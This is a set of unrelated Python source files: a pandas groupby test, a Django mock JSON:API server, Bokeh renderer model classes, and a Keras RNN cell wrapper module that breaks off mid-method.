idx = pd.Index([1, 2, 3], dtype=object, name="a")
expected = pd.DataFrame({"b": arr}, index=idx)
groups = pd.DataFrame(values, dtype="Int64").groupby("a")
result = getattr(groups, function)()
tm.assert_frame_equal(result, expected)
result = groups.agg(function)
tm.assert_frame_equal(result, expected)
result = groups.agg([function])
expected.columns = MultiIndex.from_tuples([("b", function)])
tm.assert_frame_equal(result, expected)
def test_groupby_sum_below_mincount_nullable_integer():
# https://github.com/pandas-dev/pandas/issues/32861
df = pd.DataFrame({"a": [0, 1, 2], "b": [0, 1, 2], "c": [0, 1, 2]}, dtype="Int64")
grouped = df.groupby("a")
idx = pd.Index([0, 1, 2], dtype=object, name="a")
result = grouped["b"].sum(min_count=2)
expected = pd.Series([pd.NA] * 3, dtype="Int64", index=idx, name="b")
tm.assert_series_equal(result, expected)
result = grouped.sum(min_count=2)
expected = pd.DataFrame(
{"b": [pd.NA] * 3, "c": [pd.NA] * 3}, dtype="Int64", index=idx
)
tm.assert_frame_equal(result, expected)
|
|
import json
import re
from django.conf import settings
from django.http import HttpResponse, JsonResponse
from django.views.generic import View
from inflection import camelize, pluralize, singularize
from rest_framework import viewsets
from hooks import MockServerHookParser
from json_api_builder import (
JsonAPIErrorBuilder, JsonAPIResourceDetailBuilder, JsonAPIResourceListBuilder,
JsonAPIIncludedResourceListBuilder
)
class MockServerBaseViewSet(viewsets.ViewSet):
def request_contains_include(self, request):
return 'include' in request.GET.keys()
def _get_include_ids_from_rel_data(self, rel_data):
if isinstance(rel_data, list):
include_ids = [rd['id'] for rd in rel_data]
else:
include_ids = [rel_data['id']]
return include_ids
def get_include_ids_from_response(self, response, include_type):
if isinstance(response['data'], list):
include_ids = []
for obj in response['data']:
rel_data = obj['relationships'][include_type]['data']
include_ids.extend(self._get_include_ids_from_rel_data(rel_data))
else:
rel_data = response['data']['relationships'][include_type]['data']
include_ids = self._get_include_ids_from_rel_data(rel_data)
return set(include_ids)
def get_include_ids_from_included(self, included, include_type):
include_ids = []
for include_object in included:
try:
rel_data = include_object['relationships'][include_type]['data']
            except (KeyError, TypeError):
pass
else:
include_ids.extend(self._get_include_ids_from_rel_data(rel_data))
break
return set(include_ids)
def add_include_objects(self, request, response, length=10, overrides=None):
include_groups = [group.split('.') for group in request.GET.get('include').split(',')]
for include_group in include_groups:
for x, include_type in enumerate(include_group):
resource_type = camelize(include_type, uppercase_first_letter=False)
if x == 0:
include_ids = self.get_include_ids_from_response(response, resource_type)
else:
include_ids = self.get_include_ids_from_included(response['included'], resource_type)
json_api_builder = JsonAPIIncludedResourceListBuilder(request,
include_type,
include_ids,
self.page_size,
length,
config=overrides)
include_objects = json_api_builder.build_include_list()
if include_objects:
response.setdefault("included", []).extend(include_objects)
return response
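# Illustrative sketch of the include expansion above (the resource names are
# assumptions, not defined by this mock server): a request such as
#
#   GET /articles?include=author,comments.author
#
# yields include_groups == [['author'], ['comments', 'author']]; the first
# segment of each group is resolved against response['data'] and any deeper
# segments against the already collected response['included'] objects.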
class ResourceDetailViewSet(MockServerBaseViewSet):
allowed_methods = ['GET', 'PATCH', 'DELETE', 'OPTIONS']
def retrieve(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
self.attributes.update(overrides.get('attributes', {}))
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=self.resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
if self.request_contains_include(request):
response = self.add_include_objects(request, response, overrides=overrides)
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def partial_update(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
try:
request_data = json.loads(request.body)
if 'attributes' in request_data.get('data', {}):
overrides['attributes'].update(request_data['data']['attributes'])
        except (ValueError, KeyError, TypeError):
pass
self.attributes.update(overrides.get('attributes', {}))
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=self.resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def destroy(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
return HttpResponse(status=204)
class ResourceListViewSet(MockServerBaseViewSet):
allowed_methods = ['GET', 'POST', 'OPTIONS']
def list(self, request):
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
curr_page = int(request.GET.get('page', 1))
page_size = int(request.GET.get('page_size', self.page_size))
filter_configs = self._parse_filters_from_query_parameters(request)
overrides['filter'] = filter_configs
length = overrides['length'] if 'length' in overrides else settings.MS_DEFAULT_LIST_LENGTH
if len(overrides['filter']):
if 'id' in overrides['filter'].keys():
length = len(overrides['filter']['id'])
else:
length = length/2
json_api_builder = JsonAPIResourceListBuilder(request,
self.resource_type,
page_size,
length,
config=overrides,
curr_page=curr_page)
response = json_api_builder.build_resource_list_object()
if self.request_contains_include(request):
response = self.add_include_objects(request, response, overrides=overrides)
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def create(self, request):
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
try:
post_data = json.loads(request.body)
resource_id = 1
resource_type = post_data['data']['type']
attributes = post_data['data']['attributes']
relationships = self._parse_relationship_data(post_data)
json_api_rules = []
is_valid_request = True
        except (ValueError, KeyError, TypeError):
is_valid_request = False
if 'errors' in overrides:
json_api_builder = JsonAPIErrorBuilder(request)
response = json_api_builder.build_error_list_object(overrides['errors'])
return JsonResponse(response, status=400, content_type="application/vnd.api+json")
elif not is_valid_request:
json_api_builder = JsonAPIErrorBuilder(request)
response = json_api_builder.build_error_list_object(self.attributes)
return JsonResponse(response, status=400, content_type="application/vnd.api+json")
else:
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
return JsonResponse(response, status=201, content_type="application/vnd.api+json")
def _parse_filters_from_query_parameters(self, request):
filter_configs = {}
for param, values in request.GET.iteritems():
if param.startswith('filter'):
try:
attribute = re.search(r'\[(.*?)\]', param).group(1)
if '__' in attribute:
attribute, _ = attribute.split('__')
                except (AttributeError, ValueError):
continue
try:
values = [int(value) for value in values.split(',')]
                except ValueError:
                    values = values.split(',')
filter_configs[attribute] = values
return filter_configs
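    # Illustrative sketch of the filter syntax parsed above (parameter names
    # are assumptions for illustration): a request such as
    #
    #   GET /articles?filter[id]=1,2&filter[state__in]=draft,published
    #
    # yields {'id': [1, 2], 'state': ['draft', 'published']}: the attribute is
    # read from inside the brackets (any '__' lookup suffix is dropped) and
    # comma-separated values are cast to int when possible.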
def _parse_relationship_data(self, post_data):
relationships_definitions = []
relationships = post_data['data'].get("relationships", {})
for related_resource_type, relationship_data in relationships.iteritems():
relationship_data = relationship_data['data']
            if isinstance(relationship_data, list):
related_ids = [rd.get('id') for rd in relationship_data]
else:
related_ids = relationship_data.get('id')
relationships_definitions.append((related_resource_type, related_ids))
return relationships_definitions
class ResourceViewSet(ResourceListViewSet, ResourceDetailViewSet):
allowed_methods = ['GET', 'POST', 'PATCH', 'DELETE', 'OPTIONS']
|
|
''' Models (mostly base classes) for the various kinds of renderer
types that Bokeh supports.
'''
from __future__ import absolute_import
import logging
logger = logging.getLogger(__name__)
from ..core.enums import RenderLevel
from ..core.has_props import abstract
from ..core.properties import Auto, Bool, Either, Enum, Float, Instance, Override, String
from ..core.validation import error
from ..core.validation.errors import (BAD_COLUMN_NAME, MISSING_GLYPH, NO_SOURCE_FOR_GLYPH,
CDSVIEW_SOURCE_DOESNT_MATCH, MALFORMED_GRAPH_SOURCE)
from ..model import Model
from ..util.deprecation import deprecated
from .glyphs import Glyph, Circle, MultiLine
from .graphs import LayoutProvider, GraphHitTestPolicy, NodesOnly
from .images import ImageSource
from .sources import ColumnDataSource, DataSource, RemoteSource, CDSView
from .tiles import TileSource, WMTSTileSource
@abstract
class Renderer(Model):
'''An abstract base class for renderer types.
'''
level = Enum(RenderLevel, help="""
Specifies the level in which to paint this renderer.
""")
visible = Bool(default=True, help="""
Is the renderer visible.
""")
@abstract
class DataRenderer(Renderer):
''' An abstract base class for data renderer types (e.g. ``GlyphRenderer``, ``TileRenderer``, ``GraphRenderer``).
'''
class TileRenderer(DataRenderer):
'''
'''
tile_source = Instance(TileSource, default=lambda: WMTSTileSource(), help="""
    The tile source to use when rendering tiles on the plot.
""")
alpha = Float(1.0, help="""
tile opacity 0.0 - 1.0
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default y-range.
""")
level = Override(default="underlay")
render_parents = Bool(default=True, help="""
    Flag to enable/disable drawing of parent tiles while waiting for new tiles to arrive. Default value is True.
""")
class DynamicImageRenderer(DataRenderer):
'''
'''
def __init__(self, *args, **kw):
super(DynamicImageRenderer, self).__init__(*args, **kw)
deprecated((0, 12, 7), "DynamicImageRenderer", "GeoViews for GIS functions on top of Bokeh (http://geo.holoviews.org)")
image_source = Instance(ImageSource, help="""
Image source to use when rendering on the plot.
""")
alpha = Float(1.0, help="""
tile opacity 0.0 - 1.0
""")
level = Override(default="underlay")
render_parents = Bool(default=True, help="""
    Flag to enable/disable drawing of parent tiles while waiting for new tiles to arrive. Default value is True.
""")
class GlyphRenderer(DataRenderer):
'''
'''
@error(MISSING_GLYPH)
def _check_missing_glyph(self):
if not self.glyph: return str(self)
@error(NO_SOURCE_FOR_GLYPH)
def _check_no_source_for_glyph(self):
if not self.data_source: return str(self)
@error(CDSVIEW_SOURCE_DOESNT_MATCH)
def _check_cdsview_source(self):
if self.data_source is not self.view.source: return str(self)
@error(BAD_COLUMN_NAME)
def _check_bad_column_name(self):
if not self.glyph: return
if not self.data_source: return
if isinstance(self.data_source, RemoteSource): return
missing = set()
specs = self.glyph.dataspecs()
for name, item in self.glyph.properties_with_values(include_defaults=False).items():
if name not in specs: continue
if not isinstance(item, dict): continue
if not isinstance(self.data_source, ColumnDataSource): continue
if 'field' in item and item['field'] not in self.data_source.column_names:
missing.add(item['field'])
if missing:
return "%s [renderer: %s]" % (", ".join(sorted(missing)), self)
def __init__(self, **kw):
super(GlyphRenderer, self).__init__(**kw)
if "view" not in kw:
self.view = CDSView(source=self.data_source)
data_source = Instance(DataSource, help="""
Local data source to use when rendering glyphs on the plot.
""")
view = Instance(CDSView, help="""
A view into the data source to use when rendering glyphs. A default view
of the entire data source is created when a view is not passed in during
initialization.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
    default y-range.
""")
glyph = Instance(Glyph, help="""
The glyph to render, in conjunction with the supplied data source
and ranges.
""")
selection_glyph = Either(Auto, Instance(Glyph), default="auto", help="""
An optional glyph used for selected points.
If set to "auto" then the standard glyph will be used for selected
points.
""")
nonselection_glyph = Either(Auto, Instance(Glyph), default="auto", help="""
An optional glyph used for explicitly non-selected points
(i.e., non-selected when there are other points that are selected,
but not when no points at all are selected.)
If set to "auto" then a glyph with a low alpha value (0.1) will
be used for non-selected points.
""")
hover_glyph = Instance(Glyph, help="""
An optional glyph used for inspected points, e.g., those that are
being hovered over by a HoverTool.
""")
muted_glyph = Instance(Glyph, help="""
""")
muted = Bool(False, help="""
""")
level = Override(default="glyph")
_DEFAULT_NODE_RENDERER = lambda: GlyphRenderer(
glyph=Circle(), data_source=ColumnDataSource(data=dict(index=[]))
)
_DEFAULT_EDGE_RENDERER = lambda: GlyphRenderer(
glyph=MultiLine(), data_source=ColumnDataSource(data=dict(start=[], end=[]))
)
class GraphRenderer(DataRenderer):
'''
'''
@error(MALFORMED_GRAPH_SOURCE)
def _check_malformed_graph_source(self):
missing = []
if "index" not in self.node_renderer.data_source.column_names:
missing.append("Column 'index' is missing in GraphSource.node_renderer.data_source")
if "start" not in self.edge_renderer.data_source.column_names:
missing.append("Column 'start' is missing in GraphSource.edge_renderer.data_source")
if "end" not in self.edge_renderer.data_source.column_names:
missing.append("Column 'end' is missing in GraphSource.edge_renderer.data_source")
if missing:
return " ,".join(missing) + " [%s]" % self
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering graphs on the plot. If unset, use the
default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering graphs on the plot. If unset, use the
    default y-range.
""")
layout_provider = Instance(LayoutProvider, help="""
An instance of a LayoutProvider that supplies the layout of the network
graph in cartesian space.
""")
node_renderer = Instance(GlyphRenderer, default=_DEFAULT_NODE_RENDERER, help="""
Instance of a GlyphRenderer containing an XYGlyph that will be rendered
as the graph nodes.
""")
edge_renderer = Instance(GlyphRenderer, default=_DEFAULT_EDGE_RENDERER, help="""
Instance of a GlyphRenderer containing an MultiLine Glyph that will be
rendered as the graph edges.
""")
selection_policy = Instance(GraphHitTestPolicy, default=lambda: NodesOnly(), help="""
An instance of a GraphHitTestPolicy that provides the logic for selection
of graph components.
""")
inspection_policy = Instance(GraphHitTestPolicy, default=lambda: NodesOnly(), help="""
An instance of a GraphHitTestPolicy that provides the logic for inspection
of graph components.
""")
level = Override(default="glyph")
@abstract
class GuideRenderer(Renderer):
''' A base class for all guide renderer types. ``GuideRenderer`` is
not generally useful to instantiate on its own.
'''
plot = Instance(".models.plots.Plot", help="""
The plot to which this guide renderer is attached.
""")
def __init__(self, **kwargs):
super(GuideRenderer, self).__init__(**kwargs)
if self.plot is not None:
if self not in self.plot.renderers:
self.plot.renderers.append(self)
level = Override(default="overlay")
|
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module implementing RNN wrappers."""
# pylint: disable=g-direct-tensorflow-import
# Note that all the APIs under this module are exported as tf.nn.*. This is
# because those APIs originally lived in tf.nn.rnn_cell_impl. They are ported
# here to avoid the cyclic dependency issue for serialization. These APIs will
# probably be deprecated and removed in the future, since a similar API is
# available in the existing Keras RNN API.
import hashlib
import numbers
import sys
import types as python_types
import warnings
from keras.layers.rnn import lstm
from keras.layers.rnn.abstract_rnn_cell import AbstractRNNCell
from keras.utils import generic_utils
from keras.utils import tf_inspect
import tensorflow.compat.v2 as tf
from tensorflow.python.util.tf_export import tf_export
class _RNNCellWrapper(AbstractRNNCell):
"""Base class for cells wrappers V2 compatibility.
This class along with `rnn_cell_impl._RNNCellWrapperV1` allows to define
wrappers that are compatible with V1 and V2, and defines helper methods for
this purpose.
"""
def __init__(self, cell, *args, **kwargs):
super(_RNNCellWrapper, self).__init__(*args, **kwargs)
self.cell = cell
cell_call_spec = tf_inspect.getfullargspec(cell.call)
self._expects_training_arg = ("training" in cell_call_spec.args) or (
cell_call_spec.varkw is not None
)
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Calls the wrapped cell and performs the wrapping logic.
This method is called from the wrapper's `call` or `__call__` methods.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
raise NotImplementedError
def call(self, inputs, state, **kwargs):
"""Runs the RNN cell step computation.
When `call` is being used, we assume that the wrapper object has been built,
and therefore the wrapped cells has been built via its `build` method and
its `call` method can be used directly.
This allows to use the wrapped cell and the non-wrapped cell equivalently
when using `call` and `build`.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
**kwargs: Additional arguments passed to the wrapped cell's `call`.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
return self._call_wrapped_cell(
inputs, state, cell_call_fn=self.cell.call, **kwargs)
def build(self, inputs_shape):
"""Builds the wrapped cell."""
self.cell.build(inputs_shape)
self.built = True
@property
def wrapped_cell(self):
return self.cell
@property
def state_size(self):
return self.cell.state_size
@property
def output_size(self):
return self.cell.output_size
def zero_state(self, batch_size, dtype):
with tf.name_scope(type(self).__name__ + "ZeroState"):
return self.cell.zero_state(batch_size, dtype)
def get_config(self):
config = {
"cell": {
"class_name": self.cell.__class__.__name__,
"config": self.cell.get_config()
},
}
base_config = super(_RNNCellWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
config = config.copy()
from keras.layers.serialization import deserialize as deserialize_layer # pylint: disable=g-import-not-at-top
cell = deserialize_layer(config.pop("cell"), custom_objects=custom_objects)
return cls(cell, **config)
@tf_export("nn.RNNCellDropoutWrapper", v1=[])
class DropoutWrapper(_RNNCellWrapper):
"""Operator adding dropout to inputs and outputs of the given cell."""
def __init__(self,
cell,
input_keep_prob=1.0,
output_keep_prob=1.0,
state_keep_prob=1.0,
variational_recurrent=False,
input_size=None,
dtype=None,
seed=None,
dropout_state_filter_visitor=None,
**kwargs):
"""Create a cell with added input, state, and/or output dropout.
If `variational_recurrent` is set to `True` (**NOT** the default behavior),
then the same dropout mask is applied at every step, as described in:
[A Theoretically Grounded Application of Dropout in Recurrent
Neural Networks. Y. Gal, Z. Ghahramani](https://arxiv.org/abs/1512.05287).
Otherwise a different dropout mask is applied at every time step.
Note, by default (unless a custom `dropout_state_filter` is provided),
the memory state (`c` component of any `LSTMStateTuple`) passing through
a `DropoutWrapper` is never modified. This behavior is described in the
above article.
Args:
          cell: an RNNCell; dropout is added to its inputs, outputs and/or state.
input_keep_prob: unit Tensor or float between 0 and 1, input keep
probability; if it is constant and 1, no input dropout will be added.
output_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
          state_keep_prob: unit Tensor or float between 0 and 1, state keep
            probability; if it is constant and 1, no state dropout will be added.
State dropout is performed on the outgoing states of the cell. **Note**
the state components to which dropout is applied when `state_keep_prob`
is in `(0, 1)` are also determined by the argument
`dropout_state_filter_visitor` (e.g. by default dropout is never applied
to the `c` component of an `LSTMStateTuple`).
variational_recurrent: Python bool. If `True`, then the same dropout
pattern is applied across all time steps per run call. If this parameter
is set, `input_size` **must** be provided.
input_size: (optional) (possibly nested tuple of) `TensorShape` objects
containing the depth(s) of the input tensors expected to be passed in to
the `DropoutWrapper`. Required and used **iff** `variational_recurrent
= True` and `input_keep_prob < 1`.
dtype: (optional) The `dtype` of the input, state, and output tensors.
Required and used **iff** `variational_recurrent = True`.
seed: (optional) integer, the randomness seed.
dropout_state_filter_visitor: (optional), default: (see below). Function
that takes any hierarchical level of the state and returns a scalar or
depth=1 structure of Python booleans describing which terms in the state
should be dropped out. In addition, if the function returns `True`,
dropout is applied across this sublevel. If the function returns
`False`, dropout is not applied across this entire sublevel.
Default behavior: perform dropout on all terms except the memory (`c`)
state of `LSTMCellState` objects, and don't try to apply dropout to
            `TensorArray` objects:
            ```
            def dropout_state_filter_visitor(s):
                if isinstance(s, LSTMCellState):
                    # Never perform dropout on the c state.
                    return LSTMCellState(c=False, h=True)
                elif isinstance(s, TensorArray):
                    return False
                return True
            ```
**kwargs: dict of keyword arguments for base layer.
Raises:
TypeError: if `cell` is not an `RNNCell`, or `keep_state_fn` is provided
but not `callable`.
ValueError: if any of the keep_probs are not between 0 and 1.
"""
if isinstance(cell, lstm.LSTMCell):
raise ValueError("keras LSTM cell does not work with DropoutWrapper. "
"Please use LSTMCell(dropout=x, recurrent_dropout=y) "
"instead.")
super(DropoutWrapper, self).__init__(cell, dtype=dtype, **kwargs)
if (dropout_state_filter_visitor is not None and
not callable(dropout_state_filter_visitor)):
raise TypeError("dropout_state_filter_visitor must be callable. "
f"Received: {dropout_state_filter_visitor}")
self._dropout_state_filter = (
dropout_state_filter_visitor or _default_dropout_state_filter_visitor)
with tf.name_scope("DropoutWrapperInit"):
def tensor_and_const_value(v):
tensor_value = tf.convert_to_tensor(v)
const_value = tf.get_static_value(tensor_value)
return (tensor_value, const_value)
for prob, attr in [(input_keep_prob, "input_keep_prob"),
(state_keep_prob, "state_keep_prob"),
(output_keep_prob, "output_keep_prob")]:
tensor_prob, const_prob = tensor_and_const_value(prob)
if const_prob is not None:
if const_prob < 0 or const_prob > 1:
raise ValueError(
f"Parameter {attr} must be between 0 and 1. "
"Received {const_prob}")
setattr(self, "_%s" % attr, float(const_prob))
else:
setattr(self, "_%s" % attr, tensor_prob)
# Set variational_recurrent, seed before running the code below
self._variational_recurrent = variational_recurrent
self._input_size = input_size
self._seed = seed
self._recurrent_input_noise = None
self._recurrent_state_noise = None
self._recurrent_output_noise = None
if variational_recurrent:
if dtype is None:
raise ValueError(
"When variational_recurrent=True, dtype must be provided")
def convert_to_batch_shape(s):
# Prepend a 1 for the batch dimension; for recurrent
# variational dropout we use the same dropout mask for all
# batch elements.
return tf.concat(([1], tf.TensorShape(s).as_list()), 0)
def batch_noise(s, inner_seed):
shape = convert_to_batch_shape(s)
return tf.random.uniform(shape, seed=inner_seed, dtype=dtype)
if (not isinstance(self._input_keep_prob, numbers.Real) or
self._input_keep_prob < 1.0):
if input_size is None:
raise ValueError(
"When variational_recurrent=True and input_keep_prob < 1.0 or "
"is unknown, input_size must be provided")
self._recurrent_input_noise = _enumerated_map_structure_up_to(
input_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("input", i)),
input_size)
self._recurrent_state_noise = _enumerated_map_structure_up_to(
cell.state_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("state", i)),
cell.state_size)
self._recurrent_output_noise = _enumerated_map_structure_up_to(
cell.output_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("output", i)),
cell.output_size)
def _gen_seed(self, salt_prefix, index):
if self._seed is None:
return None
salt = "%s_%d" % (salt_prefix, index)
string = (str(self._seed) + salt).encode("utf-8")
return int(hashlib.md5(string).hexdigest()[:8], 16) & 0x7FFFFFFF
def _variational_recurrent_dropout_value(
self, unused_index, value, noise, keep_prob):
"""Performs dropout given the pre-calculated noise tensor."""
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob + noise
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
ret = tf.divide(value, keep_prob) * binary_tensor
ret.set_shape(value.get_shape())
return ret
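    # Worked example (illustrative): with keep_prob = 0.8 and noise drawn from
    # U[0, 1), random_tensor lies in [0.8, 1.8), so tf.floor() yields 1 with
    # probability 0.8 and 0 otherwise; surviving entries are rescaled by
    # 1 / 0.8 so the expected value of the result is unchanged.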
def _dropout(self,
values,
salt_prefix,
recurrent_noise,
keep_prob,
shallow_filtered_substructure=None):
"""Decides whether to perform standard dropout or recurrent dropout."""
if shallow_filtered_substructure is None:
# Put something so we traverse the entire structure; inside the
# dropout function we check to see if leafs of this are bool or not.
shallow_filtered_substructure = values
if not self._variational_recurrent:
def dropout(i, do_dropout, v):
if not isinstance(do_dropout, bool) or do_dropout:
return tf.nn.dropout(
v, rate=1. - keep_prob, seed=self._gen_seed(salt_prefix, i))
else:
return v
return _enumerated_map_structure_up_to(
shallow_filtered_substructure, dropout,
*[shallow_filtered_substructure, values])
else:
def dropout(i, do_dropout, v, n):
if not isinstance(do_dropout, bool) or do_dropout:
return self._variational_recurrent_dropout_value(i, v, n, keep_prob)
else:
return v
return _enumerated_map_structure_up_to(
shallow_filtered_substructure, dropout,
*[shallow_filtered_substructure, values, recurrent_noise])
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Runs the wrapped cell and applies dropout.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
def _should_dropout(p):
return (not isinstance(p, float)) or p < 1
if _should_dropout(self._input_keep_prob):
inputs = self._dropout(inputs, "input", self._recurrent_input_noise,
self._input_keep_prob)
output, new_state = cell_call_fn(inputs, state, **kwargs)
if _should_dropout(self._state_keep_prob):
# Identify which subsets of the state to perform dropout on and
# which ones to keep.
shallow_filtered_substructure = tf.__internal__.nest.get_traverse_shallow_structure(
self._dropout_state_filter, new_state)
new_state = self._dropout(new_state, "state", self._recurrent_state_noise,
self._state_keep_prob,
shallow_filtered_substructure)
if _should_dropout(self._output_keep_prob):
output = self._dropout(output, "output", self._recurrent_output_noise,
self._output_keep_prob)
return output, new_state
def get_config(self):
"""Returns the config of the dropout wrapper."""
config = {
"input_keep_prob": self._input_keep_prob,
"output_keep_prob": self._output_keep_prob,
"state_keep_prob": self._state_keep_prob,
"variational_recurrent": self._variational_recurrent,
"input_size": self._input_size,
"seed": self._seed,
}
if self._dropout_state_filter != _default_dropout_state_filter_visitor: # pylint: disable=comparison-with-callable
function, function_type, function_module = _serialize_function_to_config(
self._dropout_state_filter)
config.update({"dropout_fn": function,
"dropout_fn_type": function_type,
"dropout_fn_module": function_module})
base_config = super(DropoutWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
if "dropout_fn" in config:
config = config.copy()
dropout_state_filter = _parse_config_to_function(
config, custom_objects, "dropout_fn", "dropout_fn_type",
"dropout_fn_module")
config.pop("dropout_fn")
config["dropout_state_filter_visitor"] = dropout_state_filter
return super(DropoutWrapper, cls).from_config(
config, custom_objects=custom_objects)
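# A minimal usage sketch (assumed; shapes and keep probabilities are
# arbitrary): DropoutWrapper wraps a non-LSTM Keras RNN cell, and the wrapped
# cell can then be driven by a tf.keras.layers.RNN layer like any other cell:
#
#   cell = tf.keras.layers.GRUCell(8)
#   wrapped = DropoutWrapper(cell, input_keep_prob=0.9, output_keep_prob=0.9)
#   outputs = tf.keras.layers.RNN(wrapped)(tf.zeros([4, 10, 3]))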
@tf_export("nn.RNNCellResidualWrapper", v1=[])
class ResidualWrapper(_RNNCellWrapper):
"""RNNCell wrapper that ensures cell inputs are added to the outputs."""
def __init__(self, cell, residual_fn=None, **kwargs):
"""Constructs a `ResidualWrapper` for `cell`.
Args:
cell: An instance of `RNNCell`.
residual_fn: (Optional) The function to map raw cell inputs and raw cell
outputs to the actual cell outputs of the residual network.
Defaults to calling nest.map_structure on (lambda i, o: i + o), inputs
and outputs.
**kwargs: dict of keyword arguments for base layer.
"""
super(ResidualWrapper, self).__init__(cell, **kwargs)
self._residual_fn = residual_fn
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Run the cell and then apply the residual_fn on its inputs to its outputs.
Args:
inputs: cell inputs.
state: cell state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments passed to the wrapped cell's `call`.
Returns:
Tuple of cell outputs and new state.
Raises:
TypeError: If cell inputs and outputs have different structure (type).
ValueError: If cell inputs and outputs have different structure (value).
"""
outputs, new_state = cell_call_fn(inputs, state, **kwargs)
# Ensure shapes match
def assert_shape_match(inp, out):
inp.get_shape().assert_is_compatible_with(out.get_shape())
def default_residual_fn(inputs, outputs):
tf.nest.assert_same_structure(inputs, outputs)
tf.nest.map_structure(assert_shape_match, inputs, outputs)
return tf.nest.map_structure(lambda inp, out: inp + out, inputs, outputs)
res_outputs = (self._residual_fn or default_residual_fn)(inputs, outputs)
return (res_outputs, new_state)
def get_config(self):
"""Returns the config of the residual wrapper."""
if self._residual_fn is not None:
function, function_type, function_module = _serialize_function_to_config(
self._residual_fn)
config = {
"residual_fn": function,
"residual_fn_type": function_type,
"residual_fn_module": function_module
}
else:
config = {}
base_config = super(ResidualWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
if "residual_fn" in config:
config = config.copy()
residual_function = _parse_config_to_function(config, custom_objects,
"residual_fn",
"residual_fn_type",
"residual_fn_module")
config["residual_fn"] = residual_function
return super(ResidualWrapper, cls).from_config(
config, custom_objects=custom_objects)
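# A minimal usage sketch (assumed): because ResidualWrapper adds the raw inputs
# to the raw outputs, the wrapped cell's output size must match the input
# feature size unless a custom residual_fn handles the mismatch:
#
#   cell = tf.keras.layers.SimpleRNNCell(16)
#   wrapped = ResidualWrapper(cell)
#   outputs = tf.keras.layers.RNN(wrapped)(tf.zeros([4, 10, 16]))  # 16 == units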
@tf_export("nn.RNNCellDeviceWrapper", v1=[])
class DeviceWrapper(_RNNCellWrapper):
"""Operator that ensures an RNNCell runs on a particular device."""
def __init__(self, cell, device, **kwargs):
"""Construct a `DeviceWrapper` for `cell` with device `device`.
Ensures the wrapped `cell` is called with `tf.device(device)`.
Args:
cell: An instance of `RNNCell`.
device: A device string or function, for passing to `tf.device`.
**kwargs: dict of keyword arguments for base layer.
"""
super(DeviceWrapper, self).__init__(cell, **kwargs)
self._device = device
def zero_state(self, batch_size, dtype):
with tf.name_scope(type(self).__name__ + "ZeroState"):
